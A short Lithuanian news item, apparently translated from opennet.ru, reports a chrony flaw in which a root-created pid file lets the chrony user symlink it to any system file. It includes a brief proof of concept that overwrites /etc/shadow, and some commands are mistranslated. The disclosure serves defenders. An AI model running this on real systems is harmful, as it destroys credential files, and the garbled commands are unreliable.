В
Pažeidžiamumą sukelia nesaugus pid failo sukūrimas, kuris buvo sukurtas tada, kai chrony dar nebuvo iš naujo nustatęs privilegijų ir veikė kaip root. Šiuo atveju /run/chrony katalogas, kuriame įrašytas pid failas, buvo sukurtas su teisėmis 0750 per systemd-tmpfiles arba kai chronyd buvo paleista kartu su vartotoju ir grupe "chrony". Taigi, jei turite prieigą prie vartotojo chrony, pid failą /run/chrony/chronyd.pid galite pakeisti simboline nuoroda. Simbolinė nuoroda gali nurodyti bet kurį sistemos failą, kuris bus perrašytas paleidus chronyd.
root# systemctl sustabdyti chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ išeiti
root# /usr/sbin/chronyd -n
^C
# vietoj /etc/shadow turinio bus išsaugotas chronyd proceso ID
root# cat /etc/shadow
15287
Pažeidžiamumas
SUSE ir openSUSE problema
Šaltinis: opennet.ru